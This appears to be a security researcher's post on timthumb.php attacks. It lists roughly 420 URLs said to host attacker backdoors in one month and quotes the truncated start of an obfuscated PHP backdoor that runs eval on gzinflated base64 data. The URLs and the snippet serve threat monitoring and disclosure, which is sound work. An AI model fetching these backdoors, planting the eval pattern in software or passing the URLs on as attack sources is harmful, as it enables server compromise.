We have been tracking timthumb.php related attacks for a little while. And they arestill at full force. Just for the month of May, tohse are the domains we identified hostingbackdoors that were used by the attackers (420 different urls).

http://46.166.135.177/id.php
http://bibliotecaie.cinvestav.mx//wp-content/uploads/index.php
http://bizboy.org/fly/x.php
http://blogger.com.3085.a.hostable.me/myid.php
http://blogger.com.3mrdes.com/sh.php
http://blogger.com.3mrdes.com/xx.php
http://blogger.com.44.lt/tim.php
http://blogger.com.accc.org.nz/alapyu.php
http://blogger.com.aceaswift.com/content/xcyb.php
http://blogger.com.administratordebloc.ro/mct.dm
http://blogger.com.administratordebloc.ro/mct.php
http://blogger.com.antarticachilena.cl/bot.php
http://blogger.com.antarticachilena.cl/sh.php
http://blogger.com.antarticachilena.cl/xx.php
http://blogger.com.apsidoarjo.ac.id/text/up2.php
http://blogger.com.arreglandoelpais.net/sh.php
http://blogger.com.arreglandoelpais.net/xx.php
http://blogger.com.artclinic.com.br/sh.php
http://blogger.com.artclinic.com.br/xx.php
http://blogger.com.avisameinmobiliarias.es/jb.php
http://blogger.com.avisameinmobiliarias.es/sh.php
http://blogger.com.avisameinmobiliarias.es/xx.php
http://blogger.com.bookoftheweek.org/pl.php
http://blogger.com.brinquedosdebuffetinfantil.com.br/wp.php
http://blogger.com.carnivalcostumesonline.com/404.php
http://blogger.com.carnivalcostumesonline.com/bot.php
http://blogger.com.carnivalcostumesonline.com/sp.php
http://blogger.com.carnivalcostumesonline.com/xx.php
http://blogger.com.catholicphoto.org/bbs/data/gallerym2/1216040404/soul.gif??
http://blogger.com.cbcames.org/wp-content/blogs.dir/11/upload.gif
http://blogger.com.comuricazione.it/bot/xx.php
http://blogger.com.comuricazione.it/pl.php
http://blogger.com.conexaofama.com.br/config.inc.php
http://blogger.com.coyotescumbres.com/bot.php
http://blogger.com.coyotescumbres.com/sh.php
http://blogger.com.coyotescumbres.com/xx.php
http://blogger.com.crappyfiles.com/image.php
http://blogger.com.crediyasa.com/content/tes.php
http://blogger.com.dirigent.jp/gringo.php
http://blogger.com.diversystem.com.br/sh.php
http://blogger.com.diversystem.com.br/xx.php
http://blogger.com.djnick-mcgiany.com/ds.php
http://blogger.com.djnick-mcgiany.com/mct.php
http://blogger.com.dlh-digital.com/cox.php
http://blogger.com.edchaoimage.com/db.php
http://blogger.com.elicina-id.com/injekan.php
http://blogger.com.elicina-id.com/iprobot.php
http://blogger.com.el-manhal.com/mods/sh.php
http://blogger.com.expressacred.com/bot.php
http://blogger.com.expressacred.com/sh.php
http://blogger.com.expressacred.com/xx.php
http://blogger.com.fairnesstips.com/sh.php
http://blogger.com.fairnesstips.com/xx.php
http://blogger.com.fehrmanns.com/cok.php
http://blogger.com.gamag.co.za/sh.php
http://blogger.com.gamag.co.za/xx.php
http://blogger.com.hitechcomputerservice.com/jb.php
http://blogger.com.hitechcomputerservice.com/sh.php
http://blogger.com.hitechcomputerservice.com/xx.php
http://blogger.com.holidaygallery.net/x3.php
http://blogger.com.iglesembalagens.com.br/blog/wp-config.php
http://blogger.com.iglesembalagens.com.br/blog/wp-login.php
http://blogger.com.itu-innovators.dk/sh.php
http://blogger.com.itu-innovators.dk/xx.php
http://blogger.com.johelmonte.pt/cgi/info.php
http://blogger.com.katrecan.com/sema.php
http://blogger.com.kforkent.com/shell.php
http://blogger.com.liceo10.edu.uy/sh.php
http://blogger.com.liceo10.edu.uy/xx.php
http://blogger.com.lochin.org/both.php
http://blogger.com.lochin.org/lin.php
http://blogger.com.lochin.org/nina.php
http://blogger.com.lochin.org/user.php
http://blogger.com.lunaazulstudio.com/log.php
http://blogger.com.mesco.com.vn/ikhy.php
http://blogger.com.mesco.com.vn/login.php
http://blogger.community.capedrium-campus.fr/wp.php
http://blogger.community.cherryontop.dk/1.php
http://blogger.community.eccspl.com.br/2.php
http://blogger.community.ramil.cl/2.php
http://blogger.community.transpackchile.com/2.php
http://blogger.com.musikgratisan.com/stun.php
http://blogger.com.narasopamedia.com/italy.php
http://blogger.com.narenlive.com/songs/phantom.php
http://blogger.com.newbuysellrealestate.com/404.php
http://blogger.com.newbuysellrealestate.com/bot.php
http://blogger.com.newbuysellrealestate.com/sp.php
http://blogger.com.newbuysellrealestate.com/xx.php
http://blogger.com.nooma.co.za/sh.php
http://blogger.com.nooma.co.za/xx.php
http://blogger.com.objetivatelemarketing.com.br/sh.php
http://blogger.com.objetivatelemarketing.com.br/xx.php
http://blogger.com.odontomix.com/sh.php
http://blogger.com.odontomix.com/xx.php
http://blogger.com.ongcatavento.org/index.php
http://blogger.com.orquestagalatea.com/sh.php
http://blogger.com.orquestagalatea.com/xx.php
http://blogger.com.pansoftds.com/sh.php
http://blogger.com.pansoftds.com/xx.php
http://blogger.com.perbovbjerg.dk/sh.php
http://blogger.com.perbovbjerg.dk/xx.php
http://blogger.com.pisciculturanovaera.com.br/sh.php
http://blogger.com.pisciculturanovaera.com.br/xx.php
http://blogger.com.plainlanddental.com.au/injekan.php
http://blogger.com.plainlanddental.com.au/jack.php
http://blogger.com.pnwhi.com/both.php
http://blogger.com.pnwhi.com/lin.php
http://blogger.com.pnwhi.com/nina.php
http://blogger.com.pnwhi.com/user.php
http://blogger.com.poopswa.asn.au/bot.php
http://blogger.com.poopswa.asn.au/sh.php
http://blogger.com.poopswa.asn.au/xx.php
http://blogger.com.portalconcilia.com/404.php
http://blogger.com.positiveblackmencoalition.com/cok.php
http://blogger.com.rickotton.com/injekan.php
http://blogger.com.rickotton.com/probot.php
http://blogger.com.sienbity.com/force.php
http://blogger.com.spectra-entertainment.com/z.php
http://blogger.com.stiabanten.ac.id/text/up2.php
http://blogger.com.sue-darlison-furniture.co.uk/bot.php
http://blogger.com.sue-darlison-furniture.co.uk/sh.php
http://blogger.com.sue-darlison-furniture.co.uk/xx.php
http://blogger.com.teenytottiles.com/cilik.php
http://blogger.com.termasdelpizarro.com.ar/xx.php
http://blogger.com.tfbonline.com/injekan.php
http://blogger.com.thinkgadgets.co.cc/stunshell.php
http://blogger.com.thistledoo.co.za/sh.php
http://blogger.com.thistledoo.co.za/xx.php
http://blogger.com.touchadjustclip.com/my.php
http://blogger.com.trigger.ro/jb.php
http://blogger.com.trigger.ro/sh.php
http://blogger.com.trigger.ro/xx.php
http://blogger.com.triptoworld.net/cox.php
http://blogger.com.uangotomatic.com/injekan.php
http://blogger.com.vietnamtours.pikachu.webchuyennghiep.net/image.php
http://blogger.com.vocesdelaesperanza.com/shell.php
http://blogger.com.vulnweb.com/F5JXrZ5W.php
http://blogger.com.vulnweb.com/iCXEdWYq.php
http://blogger.com.vulnweb.com/IYx4wRAO.php
http://blogger.com.vulnweb.com/KjP91sei.php
http://blogger.com.vulnweb.com/ksmaXJQj.php
http://blogger.com.vulnweb.com/kTqnAb2I.php
http://blogger.com.vulnweb.com/l5epyeeQ.php
http://blogger.com.vulnweb.com/lDCbz391.php
http://blogger.com.vulnweb.com/lMAe6dgc.php
http://blogger.com.vulnweb.com/NlcwEscw.php
http://blogger.com.vulnweb.com/nNyN4d0y.php
http://blogger.com.vulnweb.com/pLWIlDWJ.php
http://blogger.com.vulnweb.com/Q7skzwIL.php
http://blogger.com.vulnweb.com/QfZg3mqN.php
http://blogger.com.vulnweb.com/rfhwU63i.php
http://blogger.com.vulnweb.com/s07QnyPf.php
http://blogger.com.vulnweb.com/U7CuV56t.php
http://blogger.com.vulnweb.com/v7AAQOPr.php
http://blogger.com.vulnweb.com/VbsekdJK.php
http://blogger.com.vulnweb.com/vwFIWscT.php
http://blogger.com.vulnweb.com/WGXoOyRA.php
http://blogger.com.vulnweb.com/XkBoWHXX.php
http://blogger.com.vulnweb.com/yi7jaMb1.php
http://blogger.com.webbmotellet.se/count.php
http://caritasamersfoort.nl//wp-content/themes/themorningafter/cache/ikhy.php
http://caritasamersfoort.nl//wp-content/themes/themorningafter/cache/login.php
http://cmafreewebsites.com/showcase/newspresssite//wp-content/themes/newspress/cache/LC.php
http://discoveryengine.com/discobot.html)"
http://dubsmugglers.com/test/injector/asu/ikhy.php
http://dubsmugglers.com/test/injector/asu/login.php
http://durossdesign.com/img/css/lks/xcyb
http://firstcoastmultimedia.com/owa/login.php
http://flickr.com.administratordebloc.ro/dm.php
http://flickr.com.administratordebloc.ro/mct.php
http://flickr.com.arc-atmajaya.org/config.inc.php
http://flickr.com.asimare.com.br/alapyu.php
http://flickr.com.bpmohio.com/bad.php
http://flickr.com.bpmohio.com/load.php
http://flickr.comcrews.azuka.biz/bb.jpg
http://flickr.comcrews.azuka.biz/crew.php
http://flickr.com.danieljr.com.br/bot.php
http://flickr.com.danieljr.com.br/sh.php
http://flickr.com.danieljr.com.br/xx.php
http://flickr.com.levelfs.com/dmm.php
http://flickr.com.levelfs.com/mct.php
http://flickr.com.losvideosmasvistos.net/content/png.php
http://flickr.com.maispatos.com.br/content/gif.php
http://flickr.com.maispatos.com.br/content/png.php
http://flickr.com.miletus.es/content/png.php
http://flickr.com.mmonlinefashions.com/bot.php
http://flickr.com.mmonlinefashions.com/sh.php
http://flickr.com.mmonlinefashions.com/xx.php
http://flickr.com.musicui.com/bot.php
http://flickr.com.musicui.com/sh.php
http://flickr.com.musicui.com/xx.php
http://flickr.com.orlandobulletin.com/perl.php
http://flickr.com.ps-x.us.to/content/gif.php
http://flickr.com.simplysensationaleventsandcatering.com/bot.php
http://flickr.com.simplysensationaleventsandcatering.com/sh.php
http://flickr.com.simplysensationaleventsandcatering.com/xx.php
http://flickr.com.trdod.com/login.php
http://flickr.com.vialivredourados.com.br/content/content.php
http://flickr.com.vialivredourados.com.br/content/lib.php
http://flickr.com.web.77wallstreet.com/content/gif.php
http://img.youtube.com.99ves.com/yahoo.php
http://img.youtube.com.amc-pk.com/harie.php
http://img.youtube.com.badogcnc.com/juv.php
http://img.youtube.com.cr3ativiz.web.id/index.php
http://img.youtube.com.crediyasa.com/content/img.php
http://img.youtube.com.d2drumline.com/juv.php
http://img.youtube.com.fdefausto.com/bot/xx.php
http://img.youtube.com.grinis.com/upload.php
http://img.youtube.com.imworldclass.com/perasaan.php
http://img.youtube.com.junglerumblepartyvenue.co.za/antisux.php
http://img.youtube.com.lacolmenagroup.com.ar/inc.php
http://img.youtube.com.mumsandbabes.com.my/txt/upload.php
http://img.youtube.com.muzeumi.itdc.ge/view.php
http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php
http://img.youtube.com.n0why.us/wp-content/themes/ultimateblogger/images/teddy/teddy/teddy.php
http://img.youtube.com.n0why.us/wp-includes/teddy/teddy.php
http://img.youtube.com.naapsse.com/perasaan.php
http://img.youtube.com.prodajpricu.com/antisux.php
http://img.youtube.com.prodajpricu.com/index.php
http://img.youtube.com.prodajpricu.com/youtube.php
http://img.youtube.com.spectra-entertainment.com/upload.php
http://img.youtube.com.urix.cl/index.php
http://img.youtube.grinis.com/upload.php
http://israbridge.com/blogger.com/cox.php
http://jiffyvoice.com//wp-content/themes/PersonalPress/cache/34e3a3a74f6e2d0f236bdd3ba70c0c03.php
http://knigidecada.net//wp-content/themes/Cion/cache/1.php?act=f&f=ikhy.php
http://knigidecada.net//wp-content/themes/Cion/cache/1.php?act=f&f=login.php
http://livinginrwanda.com/chat/bss.txt
http://orangepen.ro/css/htacess.php
http://picasa.com.adelbacau.ro/sing.php
http://picasa.com.alfurqantutor.com/logs/logs.php
http://picasa.com.alfurqantutor.com/logs/uname.php
http://picasa.com.amc-pk.com/harie.php
http://picasa.com.atlantamedicalinstitute.com/login.php
http://picasa.com.banigualdad.cl/cybercrime.php
http://picasa.com.bargierihost.com/cok.php
http://picasa.com.boardgamegear.com/ho1onk.php
http://picasa.combo.lexiesplanet.com/tim.php
http://picasa.combos.orgasmguide.org/byroe.php
http://picasa.com.bptpastairegarden.com/cybercrime.php
http://picasa.com.builtmotion.com/hsdv/hsdv.php
http://picasa.com.bullsharkdivers.com/decode.php
http://picasa.com.bullsharkdivers.com/kalumba.php
http://picasa.com.castlefan.org/cok.php
http://picasa.com.conexaofama.com.br/config.php
http://picasa.com.cozinhadagloria.com.br/cybercrime.php
http://picasa.com.cr3ativiz.web.id/timthumb.php
http://picasa.com.csbhost.com/spread.php
http://picasa.com.csbhost.com/w00t.php
http://picasa.com.daimonionarts.com/a/x.php
http://picasa.com.daimonionarts.com/x.php
http://picasa.com.debateandreview.com/injektor.php
http://picasa.com.devonportchurches.org.au/simple.php
http://picasa.com.di-squad.com/module.php
http://picasa.com.djnick-mcgiany.com/dmm.php
http://picasa.com.djnick-mcgiany.com/dm.php
http://picasa.com.djnick-mcgiany.com/mct.php
http://picasa.com.ds.tl/wp-content/php/words/b1.php
http://picasa.com.edicionesdidactikids.cl/bob.php
http://picasa.com.edicionesdidactikids.cl/count.php
http://picasa.com.eroslighting.com.au/injektor/injektor.php
http://picasa.com.esalli.com/login.php
http://picasa.com.evolution-store.net/config.inc.php
http://picasa.com.fairnesstips.com/yahoo.php
http://picasa.com.familiaydesarrollo.org/config.inc.php
http://picasa.com.fostering.in/ikhy.php
http://picasa.com.friv-juegos.co/apache/b1.php
http://picasa.com.fsquaredmedia.com/no2.php
http://picasa.com.greenhallway.ca/cok.php
http://picasa.com.hackz.name/1/m.php
http://picasa.com.hackz.name/god.php
http://picasa.com.hackz.name/lol.php
http://picasa.com.hackz.name/mafia.php
http://picasa.com.healthierlifeplan.com/login.php
http://picasa.com.hidro-ronda.com/both.php
http://picasa.com.hidro-ronda.com/lin.php
http://picasa.com.hidro-ronda.com/nina.php
http://picasa.com.hidro-ronda.com/user.php
http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/b1.php
http://picasa.com.ipsupply.com.au/wp-content/uploads/2012/03/IN.php
http://picasa.com.ipsupply.com.au/wp-content/uploads/2012/03/load.php
http://picasa.com.itspj.com/cybercrime.php
http://picasa.com.jcibuenosaires.com.ar/2.php
http://picasa.com.kereny.ro/go.php
http://picasa.com.kereny.ro/x.php
http://picasa.com.kiditect.com/pl.php
http://picasa.com.klik4free.net/File/w00t.php
http://picasa.com.marathmola.com/cok.php
http://picasa.com.montroyalautobus.com/yahoo.php
http://picasa.com.moveissantafe.com/yahoo.php
http://picasa.communication.fees.cl/2.php
http://picasa.communication.mintweb.dk/2.php
http://picasa.communication.mushindojo-bistrita.ro/wp.php
http://picasa.communication.ventasexclusivas.cl/2.php
http://picasa.com.nieca.com/rabot.php
http://picasa.com.pakarwebsite.com/xpl/yahoo.php
http://picasa.com.playteck.net/spread.php
http://picasa.com.portobello.com.au/cybercrime.php
http://picasa.com.portobello.com.au/phantom.php
http://picasa.com.prisonbucket.com/itel.php
http://picasa.com.prodajpricu.com/index.php
http://picasa.com.reginaalcalde.cl/contents/bob.php
http://picasa.com.reginaalcalde.cl/contents/count.php
http://picasa.com.sharmilas.co.uk/pl.php
http://picasa.com.sigeart.com/wp-content/images/soul.php
http://picasa.comsing.nazuka.net/sing.php
http://picasa.com.snap-u.com/yahoo.php
http://picasa.com.toldgomes.pt/both.php
http://picasa.com.toldgomes.pt/nina.php
http://picasa.com.toldgomes.pt/nin.php
http://picasa.com.tomi.com.au/logs/404.php
http://picasa.com.tomi.com.au/logs/kacuk.php
http://picasa.com.tomi.com.au/logs/shell.php
http://picasa.com.tomi.com.au/logs/xcyb.php
http://picasa.com.truephenomenon.com/cybercrime.php
http://picasa.com.urix.cl/cgi-bin.php
http://picasa.com.uslulaw.com/menu.php
http://picasa.com.utalent.org/itel.php
http://picasa.com.utalent.org/service/hsdv.php
http://picasa.com.webbmotellet.se/count.php
http://picasa.com.welitonmaia.com.br/bot.php
http://picasa.com.welitonmaia.com.br/sh.php
http://picasa.com.welitonmaia.com.br/xx.php
http://picasa.com.wesmira.com/injekan.php
http://picasa.com.xpl.be/yahoo.php
http://picasa.com.yenisahne.com/cybercrime.php
http://picasa.com.zlinkerparts.com/yahoo.php
http://picasa.dairi-online.org/ho1onk.php
http://pitfoto.eu/wp-content/themes/kingsize/images/gallery/login.php
http://procmocoescielo.com.br/timthumb/ikhy.php
http://procmocoescielo.com.br/timthumb/login.php
http://shinnongclinic.com/kor_board/icon/member_image_box/1/pl.php
http://tokokuepondokhijau.com/wp-admin/js/ikhy.php
http://tokokuepondokhijau.com/wp-admin/js/login.php
http://womenmagazine.pp.ua//read.php
http://wordpress.com.acadteam.com/eva.php
http://wordpress.com.airatrip.com/temp/dapetsatu.php
http://wordpress.com.airatrip.com/temp/icon.php
http://wordpress.com.airatrip.com/temp/phantom.php
http://wordpress.com.cctvnoida.in/cache.php
http://wordpress.com.cobrerodas.com.br/wp-reson.php
http://wordpress.com.defacer007.tk/juned.php
http://wordpress.com.defacer007.tk/junedz.php
http://wordpress.com.en-nur.at/injekan.php
http://wordpress.com.en-nur.at/probot.php
http://wordpress.com.framarservices.com/ecommerce/imp/userfiles/mods/sh.php
http://wordpress.com.hostdail.com/bot.php
http://wordpress.com.hostdail.com/logs/logs.php
http://wordpress.com.junglerumblepartyvenue.co.za/index.php
http://wordpress.company.clubmarutichile.cl/2.php
http://wordpress.company.draadrianacampos.com.br/2.php
http://wordpress.company.newconstructionadvice.com/2.php
http://wordpress.company.provinciadelhuasco.cl/2.php
http://wordpress.company.smiledesignofutah.com/wp.php
http://wordpress.company.veterangalleri.dk/3.php
http://wordpress.com.prolinkirc.org/index6.php
http://wordpress.com.quick-life.com/bot.php
http://wordpress.com.shootarget.com/eva.php
http://wordpress.com.sleepyvillage.ca/indeks.php
http://wordpress.com.xanapa.au.com/xanyn.php
http://wordpress.com.xanyko.in/xanyn.php
http://www.antiguadecor.com/livehelp/include/count.php
http://www.beachsoccerzeeland.nl/nitrouse/clear-all.php
http://www.bikinisnz.com/ikhy.php
http://www.bikinisnz.com/login.php
http://www.blogger.com.exl.ro/max/login.php
http://www.comositas.com/wp/asu/ikhy.php
http://www.comositas.com/wp/asu/login.php
http://www.computationalcenter.com.ar/images/google/ikhy.php
http://www.computationalcenter.com.ar/images/google/login.php
http://www.diendanceo.vn/diendan.matbaoad.com/logs.jpg
http://www.edermeneghine.com.br/consultoria///wp-admin/images/css/admin-bar.dev.css
http://www.effectuslifestyle.com//wp-admin/logs/auto
http://www.flickr.com.katiechaophoto.com/htacess.php
http://www.flickr.com.querominhalojananet.com.br/htacess.php
http://www.flickr.com.turuzzonatale.it/htacess.php
http://www.hizb.org.uk/mint/ikhy.php
http://www.hizb.org.uk/mint/login.php
http://www.jayneskitschen.co.uk/blog/tmp/cache/linkshell.txt?
http://www.kinecat.pl/shx
http://www.picasa.com.borgonicoletta.it/silet.php
http://www.picasa.com.ekoproject.it/yamaha.php
http://www.picasa.com.theblueoblique.com/eat.php
http://www.picasa.com.tunc.tk/malas.php
http://www.poppylou.com.au/spread.php
http://www.prosnow.pl/wp-includes/xhtml/query.php
http://www.prosnow.pl/wp-includes/xhtml/quota.php
http://www.purplepeppa.co.uk/cart/images/byroe.php
http://www.seoulaoi.com/bbs/icon/Home/load.php
http://www.wendyswebpagedesign.com/wp-admin/maint/numpang/ikhy.php
http://www.wendyswebpagedesign.com/wp-admin/maint/numpang/login.php

And most of them are still live. If you download them you will see many backdoor variations:

if (isset($lol)) { eval ( gzinflate(base64_decode("pZJda8IwFIbvB/sPMQhNQMR9XM05Cvsbg1DTE5vRJiEnnRbxvy9Jre5C8GJ35f143kMoyMYS+rNyn/5l/771H3T9+ABZxAHf6NI1TvSm6oDxJZ0Cc9nVG5pjxm5X9ZDa2QCEXa+TDQeWYnziXa2oqN7IoK0hOaWAH2PXA5INKYroa0XYDDoXhtFOvlZsqgk4aAzICjiALLJbps8cXiRQmj0Dv602jH4ZejFO8aQW4RYQG2hbccWeGeVVHw+6QxkwQHc+zG4FhsoHlkrlaF0gEz+GdhCEtCaAiYicjSKYWsgWKsPuTLoKMTS+vzk6mf+eLTWKWLW9l8DmKiGcdWDGh6ee8r+vRtMvsW90C2xWKrAqVjgnR5L9ZSwrD1Ud1cXT6vmVr8kpHStbi4mep6PiIfTe..

And we will keep monitoring them.